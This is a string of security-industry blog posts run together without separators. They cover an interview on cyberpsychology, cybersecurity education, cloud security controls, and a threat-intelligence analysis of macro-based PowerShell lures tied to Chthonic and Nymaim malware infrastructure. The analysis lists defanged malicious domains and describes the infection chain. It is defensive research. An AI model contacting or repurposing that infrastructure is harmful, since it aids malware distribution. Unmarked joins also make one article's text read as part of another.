Editor’s note: Dr. Mary Aiken, a cyberpsychologist, expert in cyber behavioral analysis and author, will deliver the closing keynote address at CSX North America 2017, to take place 2-4 October in Washington, D.C., USA; and CSX Europe 2017, to take place 30 October-1 November in London. Aiken recently visited with ISACA Now about several of her core areas of interest, including digital ethics and how parents can combat some of the cyber threats that could harm their children. The following is an edited transcript:
ISACA Now: What intrigued you about pursuing cyber behavioral analysis?
As a cyberpsychologist, I maintain that human behaviour can fundamentally change in cyberspace. Powerful drivers such as (perceived) anonymity, online disinhibition and psychological immersion, along with minimization of authority online, dictate that people can act very differently in cyber contexts. Therefore, there is a need for new behavioral scientific approaches and analysis in terms of understanding human, and specifically criminal behavior mediated by technology.
ISACA Now: What should organizations be especially mindful about from a digital ethics standpoint?
In 2016, NATO declared that cyberspace was a ‘domain of operations.’ People like me have been talking about cyberspace for over a decade, but this was a paradigm shift in terms of an official acknowledgement that ‘cyber’ is actually a place, an environment. This recognition gives us a great opportunity to draw on the learnings of the environmental movement. What happens in cyberspace impacts the so-called real world, and vice versa. We should therefore be very protective of this new cyber environment.
The “precautionary principle” has been used to great effect in the environmental movement, placing the onus on companies to prove that their products are doing no harm. From an ethical perspective, if we apply the precautionary principle to cyberspace, then the onus will be on organizations to prove that their digital products do no harm. We are all familiar with the benefits of Corporate Social Responsibility (CSR). There is a now an exciting opportunity for organizations to practice Cyber CSR.
ISACA Now: Which aspects of your research on virtual behavioral profiling tend to surprise people the most?
In terms of behavioral profiling, I have been involved in a dozen different research silos – everything from cyberchondria to organized cybercrime – and the one thing that I have observed is that whenever technology interfaces with a base human disposition, the result tends to be amplified and accelerated. I called this ‘the Cyber Effect,’ and wrote a book about it. A lot of people were surprised and fascinated by this insight; I believe it could be the E = mc2 of this century. If we could figure out and factor this escalation, then we could also look at technological solutions to de-escalate.
ISACA Now: What do you see as the most positive potentials of technology across the cyber environment today?
I believe that AI offers incredible potential across the cyber environment. Many of the problems that we experience in cyber contexts are in fact ‘big data’ type problems – for example cyberbullying. If we could develop machine intelligence solutions to technology-facilitated problem behaviors, then I firmly believe we could help to create a better cyber society for all, and most importantly for those who are vulnerable, such as children.
ISACA Now: Cyberchondria is probably a new concept for a lot of people. How would you characterize that term, and how prevalent is it?
Searching about health and illness are among the most popular search topics. There is lots of constructive and helpful information available online, from quality medical websites, such as the Mayo Clinic. However, it is difficult from an untrained human perspective to be objective in terms of the interpretation of bodily symptoms, and subsequent translation into medical search. There is a word for what can go wrong. Cyberchondria is a form of hypochondria manifested online.
It is described as anxiety induced as a result of escalation to review morbid or serious content while engaging in health-related search. What does that mean? It means that you have a headache (that could be anything from a hangover to a migraine), and you start clicking to read about brain tumors, and experience anxiety as a result. In other words, you may be perfectly well in physical terms, but may end up with a nasty dose of health anxiety.
ISACA Now: How concerned should parents be about cyberbullying, and what should they be doing to help their kids navigate the digital world?
Cyberbullying is a serious issue for parents, and I am very concerned about what society should be doing to tackle it. Let’s think about it like this. Real-world bullying is a problem – why? With a harsh word or punch on the playground, there is little or no evidence. However, cyberbullying is nothing but evidence; in fact, you cannot cyber-bully without leaving a significant digital trail. So, how did we ever get to a point where cyberbullying was a bigger problem that real-world bullying? There are solutions.
We could develop AI technologies for telecommunications and social media platforms that (with parental consent) could monitor digital traffic to children. The point at which the behavior escalates in terms of bullying, the AI could trigger a digital outreach to the child to “go and get help,” and a digital outreach to the parent to “go talk to your child.” Parents should not be the last to know that their child is being cyber-bullied.
ISACA Now: If you had one key inspirational message for the ISACA business technology professional community today, what would that be?
I am absolutely pro-technology. I could not do my job as a cyberpsychologist without spending most of my time online. I firmly believe that in time we will develop a whole range of technological solutions to technology-facilitated problem behaviors. It is important to remember that technology is not good or bad; it is either used well or poorly by humans.
The National Crime Agency recently revealed a fascinating intelligence assessment, uncovering the ‘pathways into cyber crime’. The key finding was that most young hackers are motivated, not by financial reward, but by idealism. The NCA added that many of those involved in cyber-crime had “highly marketable” skill sets, and evidence showed that positive role models could help steer ex-offenders towards productive technology careers.
Many people feel that re-training young cyber offenders as cyber security professionals offers a chance to kill two birds with one stone; reducing cyber-crime and simultaneously helping to reduce the cyber skills shortage. The NCA proposed creating a “toolkit of positive diversions” for young people deemed to be at risk of online criminality, such as positive mentors, coding clubs and job opportunities.
It is certainly true that today’s cybersecurity profession is in desperate need of more young talent. Our Global Information Security Workforce Study found that only 12% of the UK workforce is under 35. The NCA’s initiative is a welcome one if it can steer enthusiastic and gifted young people towards the many career opportunities awaiting them, recognising that the devil makes work for idle hands.
However, if we are to find a long-term solution to youth cyber-crime and the skills gap it is not sufficient to target educational resources, mentors and job opportunities at a narrow band of gifted youngsters on the periphery of cyber-crime. The true solution is make such career opportunities available to all by making cybersecurity a core aspect of the education system at all levels and across a range of relevant subjects; helping prepare the future generation for work in a digital economy. Cybersecurity is increasingly fundamental to many industries and many different jobs, from engineering to web design and the education system needs to reflect this. Why wait until young people are already on the periphery of cyber-crime to divert them onto the straight and narrow when we can equip all young people with the skills to make a positive contribution from the outset?
Fortunately, this is starting to happen now. (ISC)2 has worked with organisations including the Council of Professors and Heads of Computing (CPHC), to design cybersecurity Principles and Learning Outcomes which have been turned into part of the official accreditation criteria for all UK computing degrees under the bodies BCS and the Chartered Institute for IT.
At a subsequent curriculum development roadshow supported by the Cabinet Office, 60 UK universities demonstrated a will to champion and embed cybersecurity more comprehensively across their computing degree courses. There are now opportunities to go further and teach cybersecurity within an array of popular disciplines from psychology to business management. Further efforts are being made in Further Education; with our involvement in the development in the UK’s first ever cybersecurity EPQ helping to embed cybersecurity skills in curricula at all levels.
Employers could also aid this effort by working with colleges and universities to ‘mentor’ promising students, organising graduate recruitment fares and offering cyber apprenticeships to graduates or college leavers.
I recently attended an inspiring event at the Plymouth Science Park hosted by Bluescreen IT, which echoed these very sentiments of bringing cybersecurity into the fold at a much earlier stage. The event, which brought together leading organisations including businesses, schools, universities and the local authority examined how recent online threats and the shortage of qualified and experienced cybersecurity professionals could be tackled by both business and government. It was proposed that through bringing their respective bodies together, it could mean that their agendas could be aligned and integrated to form a proactive ‘cyber cluster’, enabling parties to shape curriculums to incorporate information security and in turn provide a pipeline of nurtured talent to the profession and local businesses.
With the internet overtaking TV as children’s favourite pastime, there is also a real opportunity to engage children in cybersecurity by incorporating it into primary and secondary school teaching materials. Cybersecurity content could be included in everything from maths classes to World War One and Two history lessons on the role of code-breakers at ‘Room 40’ and Bletchley Park. Teachers could create code-breaking competitions to make the content engaging for children.
There is also an opportunity to teach internet safety to all young people, in an age when children are increasingly exposed to the hazards of the internet, from hackers to cyber-stalkers. (ISC)2 volunteers from across the cybersecurity profession have been going into UK schools to teach over 5,000 children each term on everything from ‘sexting’ to cyber-bullying. Similar initiatives could be rolled out across all schools at a national level.
The only viable long-term solution to youth cyber-crime and the skills shortage is to ensure that our education system gives all students (and their parents) the necessary skills, knowledge and awareness to feel included in, able to contribute to and benefit from the digital economy.
By Adrian Davis, CISSP, Managing Director EMEA, (ISC)²
Even before cloud adoption became mainstream, it wasn’t uncommon for IT security needs to conflict with both business strategy and end user preferences. Almost everyone with a background in security has found themselves in the awkward position of having to advise on going against a technology with significant appeal and value because it would introduce too much risk.
In my time working both as a vendor and as a risk management consultant, few IT leaders I’ve come across want to be a roadblock when it comes to achieving business goals and accommodating (reasonable) user preferences and requests. However, they also understand the costs of a potential security or non-compliance issue down the road. Unfortunately, many IT security teams have also experienced the frustration of being overridden, either officially by executives electing to accept the risk or by users adopting unregulated, unsanctioned applications and platforms, introducing risk into the organization against their recommendation.
In today’s world of cloud computing there are more vendor options than ever and end users often come to the table with their preferences and demands. More and more I speak to IT and security leaders who have been directed to move to the cloud or have been pressured to move data to a specific cloud application for business reasons but find themselves saying no because the native cloud security controls are not enough.
Fortunately, in the past few years, solutions have emerged that allow IT and security leaders to stop saying no and instead enable the adoption of business-driven requests while giving IT teams the security controls they need to reduce risk. Cloud vendors spend a lot of time and resources to secure their infrastructure and applications, but what they are not responsible for is ensuring compliant cloud usage in their customer’s organizations.
The legal liability for data breaches is yours and yours alone. Only you can guarantee compliant usage within your organization, so it’s important to understand the types of data that will be flowing into the cloud environment and work with various stakeholders to enforce controls that will reduce risk to an acceptable level and comply with any geographic or industry regulations.
It can be tempting, as always, to lock everything down and allow users only the most basic functionality in cloud applications. However, that often results in a poor user experience and leads to unsanctioned cloud use and shadow IT.
While cloud environments are very different from on premise environments, many of the security principles are still valid. As a foundation, I often guide organizations to look at what they are doing today for on-premises security and begin with extending those same principles into the cloud. Three useful principles to begin with are:
Privilege Management Privilege management has been used in enterprises for years as an on-premises method to secure sensitive data and guide compliant user behavior by limiting access. In some cloud services, like Amazon Web Services (AWS), individual administrators can quickly amass enough power to cause significant downtime or security concerns, either unintentionally or through compromised credentials. Ensuring appropriate privilege management in the cloud can help reduce that risk.
In addition to traditional privilege management, the cloud also introduces a unique challenge when it comes to cloud service providers. Since they can access your cloud instance, it’s important to factor into your cloud risk assessment that your cloud provider also has access to your data. If you’re concerned about insider threats or government data requests served directly to the cloud provider, evaluating options to segregate data from your cloud provider is recommended.
Data Loss Protection Another reason it’s so important to speak with stakeholders and identify the type of data flowing into the cloud is to determine what data loss protection (DLP) policies you need to enforce. Common data characteristics to look out for include personally identifiable information, credit card numbers, or even source code. If you’re currently using on-premises DLP, it’s a good time to review and update your organizations’ already defined patterns and data classification definitions to ensure that they are valid and relevant as you look to extend them to the cloud.
It’s also important to also educate end users on what to expect. Good cloud security should be mostly frictionless, but, if you decided to enforce policies such blocking a transaction or requiring additional authentication for sensitive transactions, it’s important to include this in your training materials and any internal documentation provided to users. It not only lets users know what to expect, leading to fewer helpdesk tickets but also can be used to refresh users on internal policies and security basics.
Auditing A key aspect of any data security strategy is to maintain visibility into your data to ensure compliant usage. Companies need to make sure that they do not lose this capability as they migrate their data and infrastructure into the cloud. If you use security information event management (SIEM) tools today, it’s worth taking the time to decide on what cloud applications and transactions you should integrate into your reports.
By extending the controls listed above into your cloud environment, you can establish a common ground of good security practices that protect business enabling technology. With the right tools and strategy in place, it’s possible to stop saying no outright and instead come to the table enabled to empower relevant business demands while maintaining appropriate security and governance controls.
Yael Nishry, Vice President of Business Development, Vaultive
Recently, I’ve been investigating malware utilizing PowerShell and have spent a considerable amount of time refining ways to identify new variants of attacks as they appear. This posting is a follow-up of my previous work on this subject in “Pulling Back the Curtains on EncodedCommand PowerShell Attacks”.
In a sample I recently analyzed, something stood out as extremely suspicious which led me down a rabbit hole, uncovering malicious infrastructure supporting Chthonic, Nymaim, and other malware and malicious websites.
Throughout this blog post I present my analysis and thought process during this research, but if you would just like a list of the findings, they are over on our Unit42 GitHub.
One of these things is not like the others…
Most commonly, PowerShell is launched from a Microsoft Office document that uses a VBA macro to launch PowerShell to perform something malicious – typically downloading the “real” malware to run. I focused my hunting on the PowerShell activity with Palo Alto Networks AutoFocus to determine whether it’s worth digging into further based on “uniqueness” and functionality.
In this case, the first sample I looked at stood out for another reason entirely. If you take a look at the below PowerShell, you’ll quickly understand why.
This code downloads a file from the legitimate Notepad++ website. My initial thought was the worst-case scenario – they’ve been compromised and are distributing malware! I immediately downloaded the file from the website, but everything looked normal. Of course, I had to investigate further.
The sample stayed true to the previous outline I laid out for these attacks: the Microsoft Excel document appeared to be a lure about financial information, specifically a VAT invoice written in Polish as shown below.
Looking under the hood we see the VBA code that builds the PowerShell command and launches it but something seemed off. There are a ton of functions that are clearly decoding information from arrays after which it executes an already decoded PowerShell command. I decided to debug the macro and see exactly what it’s doing before I made any decisions.
If you look at the above image, there are five things to note.
1. The variable ‘horrorr’ (double ‘r’) is the result of all of the previously mentioned decoding functions. This builds a PowerShell command.
2.You can see ‘Shelleeeee horrorr, 0’ commented out, I believe this was intended to launch the previous PowerShell command.
3. The ‘Debug.Print horrorr’ prints the content of that variable in the ‘Immediate’ area shown in the screenshot. The domain in this command is NOT ‘notepad-plus-plus.org’ and can be seen below.
4. The ‘MsgBox’ will pop-up and not display anything, because the variable passed is ‘horror’ (1 ‘r’) along with the message ‘Do you really think I’m not a virus?’ in Polish.
5. The hard coded PowerShell command with ‘notepad-plus-plus.org’ will run.
The most likely conclusion that can be drawn here is that an analyst or researcher obtained this file, modified it to see the content (misspelling the variable name along the way) post-decoding, and uploaded it to see what it did in a sandbox. To be sure though, I needed to find other samples and see how they stacked up against this one.
Going back to the PowerShell command, the initial reason I stopped to look at it was due to the way they concatenated variables to form the download command and output. This also provides a perfect pivot point to hunt for samples. Using the below string to search Process Activity in AutoFocus revealed 171 samples.
The dates were all fairly recent, having been received in the past few days since the beginning of August. The documents shared the same themes for lures but the VBA macro and resulting PowerShell were more along the lines of what I expected.
For sample “538ff577a80748d87b5e738e95c8edd2bd54ea406fe3a75bf452714b17528a87” the following is an excerpt from the VBA macro building the PowerShell command.
Along with the subsequent Process Activity using the newly built PowerShell command, which aligns with what was commented out of the first sample analyzed.
Going back to the Process Activity, we can see the SHA256 value of each downloaded file and compile a list of hashes for further pivoting as shown below.
After iterating over the 171 samples, we’re left with this list of hashes for the downloaded files. Note that there are fewer payloads than there are samples, indicating many of the documents download the same payload.
Below is a table with the compile date and some PDB strings found within a few of the binaries. Most of the compile times are within the past two months, with 6 in August and a couple from as recently as two days ago at the time of this writing.
At least one of the binaries compiled in August had a PDB string I was able to locate online in a collection of other PDB files, so they may be introducing their malicious code into these files before compiling someone else’s project.
Once the file has been downloaded and executed, the new process will launch a legitimate executable, such as “msiexec.exe”, and inject code into it. This code will then download further payloads through a POST request to various websites. This pattern is shared across the original samples.
These HTTP requests match known patterns for a banking Trojan named Chthonic, which is a variant of Zeus. A good write-up from 2014 on the malware can be found in this writeup from Yury Namestnikov, Vladimir Kuskov, Oleg Kupreev at Kaspersky Lab here and indicates that the returned data is an RC4 encrypted loader that sets-up the main Chthonic module which can download additional modules or malware.
A dab of Nymaim
Iterating once again over the 171 samples and scraping out the HTTP POST requests, I ended up with the below set of domains.
1
2
3
4
5
6
7
8
amellet[.]bit
danrnysvp[.]com
ejtmjealr[.]com
firop[.]com
gefinsioje[.]com
gesofgamd[.]com
ponedobla[.]bit
unoset[.]com
Using this as the next pivot, we have 6,034 unique samples that get returned in AutoFocus having made POST requests to these sites. Additionally, we can see there were at least 3 very large campaigns where Palo Alto Networks saw activity to these sites in July.
From these distribution sites, we can see that 5,520 samples are making HTTP requests to them and these samples have been identified as another downloader Trojan named Nymaim.
The majority of the overall samples came from the following four sites.
1
2
3
4
ejtmjealr[.]com
gefinsioje[.]com
gesofgamd[.]com
ponedobla[.]bit
The ‘ejtmjealr[.]com’ domain is particularly interesting due to a similar domain, ‘ejdqzkd[.]com’ being discussed by Jarosław Jedynak of CERT.PL in this analysis of Nymaim from earlier in the year. They go on to discuss how Nymaim uses a static configuration to contact that domain, which will return IP’s that go into a DGA and output the actual IP addresses needed for C2 communication. Ben Baker, Edmund Brumaghin and Jonah Samost of Talos have a fantastic write-up of this process here.
Raising the dead – Infrastructure Archeology
To continue my analysis, I shifted focus to Maltego so as to visually graph the infrastructure. For this task, I used PassiveTotal’s Passive DNS and AutoFocus Maltego transforms. We see below the passive resolutions for these domains and how it reveals a number of IP addresses being shared between the four domains identified above.
All of the 707 IP addresses can be found here. Note that while these IP’s have been found to be hosting malicious content, this could change in the future.
Pivoting off the five highlighted IP’s above with a shared infrastructure, I pulled the reverse DNS to see what other sites may be present. The below is a sampling of the domains returned through this process.
The “idXXXXX.top” pattern immediately stands out and may suggest a pattern in the static configuration for the initial domains used by the DGA for Nymaim since the previous two started with “ejX.com.
Given the level of overlap already, I proceeded to grab all of the passive DNS available for each of the 707 IP addresses. A full list of the domains can be seen here. The below Maltego graph is used to simply illustrate the two distinct clusters of infrastructure that appeared and their interconnectedness.
From the first cluster on the left, if we sort by incoming links per node a pattern stands out in the domain names looking similar to the previously mentioned Nymaim ones. In the below image, the top domains are sorted by incoming links on the right side. Each link is a corresponding IP address and show that these domains have been rotated quite a bit between the infrastructure.
A quick search with the AutoFocus transform to pull tag information shows these are specifically related to Nymaim, most likely for the DGA seed; however, looking at domains with less links, other malware families begin to emerge.
The cluster on the right is actually collapsing one collection of entities due to the sheer size of it. Below is the collection expanded in all of its glory.
Below are the domain names linked to the singular IP address in the center.
All of these connected domains follow a pattern similar to phishing attacks masquerading as legitimate services – in this case “online.verify[.]paypal” (588) and “hmrc.secure[.]refund” (1021).
In addition to domains of that type, there is evidence of other malware distribution being carried out on this infrastructure. Collapsing the collection back down, note the two domains “brontorittoozzo[.]com” and “randomessstioprottoy[.]net” that fall outside of the collection due to more infrastructure connections.
In some of the other smaller clusters, you’ll find groupings of like malicious sites.
For example, there is a group with gems like “premarket[.]ws” like you see below being hosted on this shared infrastructure, which is a forum for less than legal services.
Along with sites like “slilpp[.]ws” which is another less than reputable site as shown below.
Which ironically has a Twitter support account that specifically states the following.
And yet another here below…
There are 632 people happily following along with relatively easy to track down accounts and usernames. A substantial amount of these accounts, on quick review, appear to follow the typical Nigerian cybercrime patterns detailed in other blogs.
Finally, there were multiple clusters of domains used by the Hancitor malware dropper to host the initial check-in and tracking as shown here.
Which can be seen as having been used in a campaign on July 03, 2017 via a post on MTA below.
Conclusion
By pivoting off of one sample we were able to zoom out and identify a sizable infrastructure of what appears to be 707 IP’s and 2,611 domains being utilized for malicious activity.
As such, these findings represent a collection of compromised websites, compromised registrar accounts used to spin up subdomains, domains used by malware DGA’s, phishing kits, carding forums, malware C2 sites, and a slew of other domains that revolve around criminal activity.
Hopefully this analysis has been helpful in understanding how truly connected some of these infrastructures can be and how with a little digging, you can uncover a substantial amount of operationally useful indicators to protect you and yours.
AutoFocus users can identify and track these threats using the Chthonic, Nymaim, and NotepadInfrastructure tags.
Just a decade ago, as security professionals, we could talk reasonably about physical security and logical security requiring different approaches. Five years ago, we might have found ourselves having conversations about the blurring lines between the two types of security discipline, and could have easily pointed to aspects of both physical and logical security that crossed over each other.
Today? In organizations that have embraced even the least cutting-edge aspects of operational and information technological advances (consumer IoT, industrial IoT, cloud hosted services, etc.), we can no longer rationally discuss a strictly “physical” or “logical” approach to managing security risks to the enterprise.
Quite simply, in a world where:
Every camera and door lock in a facility has an individual IP address
All security investigations must happen in the real and virtual worlds at the same time
Even the most visibly “physical” of protective measures – security officers – are networked via trackers and devices to provide instant information and communication
… there are few, if any, areas left that do not require attention to a holistic and comprehensive view of all security disciplines at once.
What does this mean for the personnel and management teams that are tasked with providing security in this borderless environment? How do we, as practitioners who may have long histories in a single discipline, protect the organization in a security environment where the risks and mitigation tactics have converged, regardless of whether our organizational structures have evolved to match them?
The answer: Enterprise Security Risk Management (ESRM).
ESRM is a risk management model that allows all functional areas tasked with mitigating security risk to operate under a converged philosophy and approach to more efficiently and effectively mitigate security risk across the enterprise, regardless of the physical or logical nature of the asset, or the vector of the potential threat.
Recognizing the Role ESRM allows security personnel to work together to effectively protect the enterprise from a broad spectrum of security risks by first recognizing that it is the role of the security organization, at root, to manage security risk in conjunction with the business, and to protect assets from harm in line with business tolerance.
The tasks we perform to mitigate risks might be different, but the process of identifying the assets to be protected, recognizing and prioritizing the risks to those assets, and then mitigating the assets to within acceptable levels of business tolerance, are the same. Take a look at the table below, excerpted from the forthcoming book, Enterprise Security Risk Management: Concepts and Applications (Allen & Loyear, 2017). It shows a quick side-by-side of the kinds of tasks that security groups do, and how they are essentially mitigation responses to the same security risks.
The overarching risks cannot be effectively mitigated by only a single tactical function. Working together, under a common risk management framework, all security personnel can more effectively protect the enterprise environment against security risk.
The Benefits of ESRM and Cross-Functional Risk Management Collaboration Managing all security risks in partnership and under a common ESRM approach can bring the enterprise significant gains in efficiency and effectiveness, even with multiple groups participating in the security partnership. A few to note include:
Unified security awareness messaging
A partnership approach under an ESRM philosophy allows for the creation of a single, unified, security message that include all facets of security awareness.
Single security point-of-contact
When all security teams operate under the risk-management approach with the same defined processes, any security incident can be reported to a single point in the company and escalated and directed as needed to the appropriate response team.
Operational efficiency
Employees with different skill sets can more easily collaborate on incident response processes.
Information sharing enables cross-department cooperation during security investigations that require both physical and logical forensics.
Streamlined processes save hours and money, allowing diverse security risks to be managed by a single process.
Consolidated metrics reporting to business management save time and effort.
Optimized risk profile
All security risks are identified and managed in an overarching program, making the risk identification and mitigation process more robust and decreasing the potential of overlooked risk.
How Do We Get There?
So, how do we get to the point of converging under a common philosophy, regardless of reporting lines and department structures?
All leaders in the organization with any security responsibilities can align with a risk-management approach by asking themselves:
Does my team have clear risk management goals aligned with business risk tolerance?
Does my team work with other department stakeholders in the risk decision-making process?
Do the members of my team work together with other security teams in situations that cross boundaries of scope?
Am I communicating to all areas of the business that my role, and the role of all other security teams, is to manage security risks holistically?
When all the security functions in the enterprise choose to embrace a risk management – ESRM – approach, the outcome is that:
All security teams follow a formal and consistent process for security risk decision-making.
All security teams follow the same incident response approach, including postmortem investigations and root cause analysis to continually improve the security risk situation of the enterprise.
All security teams work in partnership with one another, ensuring open communications and collaboration across department lines.
All security teams have the transparency, independence, authority and scope needed to do their work in the right way.
All security risks, no matter which team mitigates the risks, are considered part of the holistic security risk management program.
All security teams, no matter who they report to, understand that security risk management is everyone’s role.
